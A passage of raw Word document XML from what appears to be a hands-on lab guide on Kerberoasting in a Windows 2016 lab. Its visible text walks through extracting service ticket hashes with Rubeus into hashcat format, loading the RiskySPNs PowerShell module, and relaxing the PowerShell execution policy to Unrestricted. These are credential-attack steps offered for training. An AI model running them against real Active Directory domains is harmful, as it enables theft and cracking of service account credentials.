        <w:t>Now that the executable is built, open a command prompt there and enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>format:hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hashfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Then enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An example of the results of these commands is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEEBA4" w14:textId="43876C5D"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3C886C52" wp14:editId="37EE1424">
            <wp:extent cx="5400040" cy="1449070"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33869279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449070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3002BF4E" w14:textId="5FCAF62D"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8B06D6A">
          <v:shape id="_x0000_i1315" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId73" w:name="DefaultOcxName42" w:shapeid="_x0000_i1315"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, open the file in Notepad++. An example of this is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7471ED2C" w14:textId="42FFCB3C"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03625D5E" wp14:editId="3A25461E">
            <wp:extent cx="5400040" cy="3393440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170127684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3393440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A4A905" w14:textId="0B2B014E"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FA49B2A">
          <v:shape id="_x0000_i1314" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId75" w:name="DefaultOcxName43" w:shapeid="_x0000_i1314"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">While the command defines the output as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> format, it requires a little tweaking to be used in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Highlight the hash portion of the output file as shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F4FE5B" w14:textId="1AD4CD78"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18E1870E" wp14:editId="01F7CF35">
            <wp:extent cx="5400040" cy="2823845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130567898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2823845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CEC539" w14:textId="0DD1AA0B"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1F06F409">
          <v:shape id="_x0000_i1313" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId77" w:name="DefaultOcxName44" w:shapeid="_x0000_i1313"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Copy and paste the hash in a new file in Notepad++. Then highlight the first line of blank space, but do not highlight any of the text. Refer to the following screenshot for an example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870DF37" w14:textId="468FB94D"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68CCCFD7" wp14:editId="09ACD5B8">
            <wp:extent cx="5400040" cy="507365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="80888396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507365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D303411" w14:textId="6CCF26E6"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44E4B64">
          <v:shape id="_x0000_i1312" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId79" w:name="DefaultOcxName45" w:shapeid="_x0000_i1312"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, open </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> | </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and select the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> tab. Leave </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>blank</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, add nothing to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Replace</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, and select </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Replace All</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An example is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A7061" w14:textId="670D5CA8"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1AAEFE77" wp14:editId="7793400E">
            <wp:extent cx="5400040" cy="3405505"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1970883954"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3405505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC60AFC" w14:textId="45E0DF1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664EB7B">
          <v:shape id="_x0000_i1311" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId81" w:name="DefaultOcxName46" w:shapeid="_x0000_i1311"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>An example of the results of </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Step 42</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A045E8" w14:textId="48F2CC15"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28AA95C4" wp14:editId="44AA00F0">
            <wp:extent cx="4885690" cy="3589655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="991429560"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85690" cy="3589655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA69F89" w14:textId="45E82C07"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3405001">
          <v:shape id="_x0000_i1310" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId83" w:name="DefaultOcxName47" w:shapeid="_x0000_i1310"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, it is in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754324D5" w14:textId="50CAE26C"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549FAFF">
          <v:shape id="_x0000_i1309" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId84" w:name="DefaultOcxName48" w:shapeid="_x0000_i1309"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, we will review </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RiskySPN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This is another tool that we can use, and it is available in your </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Downloads\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> folder on the Windows 2016 Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE8E5F5" w14:textId="35B17959"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22EF129">
          <v:shape id="_x0000_i1308" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId85" w:name="DefaultOcxName49" w:shapeid="_x0000_i1308"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Navigate to the folder in your PowerShell window and enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Import-Module .\RiskySPNs.psm1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to import the module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAB51B" w14:textId="22D1FBCD"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DE69AA6">
          <v:shape id="_x0000_i1307" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId86" w:name="DefaultOcxName50" w:shapeid="_x0000_i1307"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>It will probably fail, so we need to either bypass the settings or change them. We have showed multiple methods of how to bypass, so we will now change the execution policy directly. To bypass it, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The output of this command is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B92A321" w14:textId="553FB00B"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32C7833C" wp14:editId="34D11C83">
            <wp:extent cx="5400040" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46638560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579120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388E60E" w14:textId="0286D3CF"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2B025FBA">
          <v:shape id="_x0000_i1306" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId88" w:name="DefaultOcxName51" w:shapeid="_x0000_i1306"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Since we are not allowed to run, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unrestricted</w:t>
